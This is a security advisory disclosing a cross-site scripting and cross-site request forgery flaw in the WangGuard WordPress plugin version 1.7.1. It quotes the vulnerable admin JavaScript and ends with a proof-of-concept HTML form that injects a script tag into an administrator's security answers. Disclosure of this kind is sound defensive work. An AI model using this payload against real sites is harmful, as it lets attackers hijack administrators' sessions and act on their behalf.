A Cross-Site Scripting vulnerability was found in the WangGuard WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE-20160724-0030
This issue was successfully tested on WangGuard WordPress Plugin version 1.7.1.
This issue is resolved in WangGuard version 1.7.2.
The WangGuard WordPress Plugin protects against sploggers and spam users registration. A Cross-Site Scripting vulnerability was found in the WangGuard WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
The issue exists in the file wangguard-admin.php and is caused by the lack of output encoding on the security questions & answers. It should be noted that this functionality is also vulnerable to Cross-Site Request Forgery.
jQuery("#wangguardnewquestionbutton").click(function() {
jQuery("#wangguardnewquestionerror").hide();
var wgq = jQuery("#wangguardnewquestion").val();
var wga = jQuery("#wangguardnewquestionanswer").val();
if ((wgq=='') || (wga=='')) {
jQuery("#wangguardnewquestionerror").slideDown();
return;
}
data = {
action : 'wangguard_ajax_questionadd',
q : wgq,
a : wga
};
jQuery.post(ajaxurl, data, function(response) {
if (response!='0') {
jQuery("#wangguard-question-noquestion").remove();
var newquest = '<div class="wangguard-question" id="wangguard-question-'+response+'">';
newquest += '<?php echo addslashes(__("Question", 'wangguard')) ?>: <strong>'+wgq+'</strong><br/>';
newquest += '<?php echo addslashes(__("Answer", 'wangguard')) ?>: <strong>'+wga+'</strong><br/>';
newquest += '<a href="javascript:void(0)" rel="'+response+'" class="wangguard-delete-question"><?php echo addslashes(__('delete question', 'wangguard')) ?></a></div>';
jQuery("#wangguard-new-question-container").append(newquest);
jQuery("#wangguardnewquestion").val("");
jQuery("#wangguardnewquestionanswer").val("");
}
else if (response=='0') {
jQuery("#wangguardnewquestionerror").slideDown();
}
});
});
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wangguard_ajax_questionadd" />
<input type="hidden" name="q" value="xss?" />
<input type="hidden" name="a" value=""><script>alert(1);</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>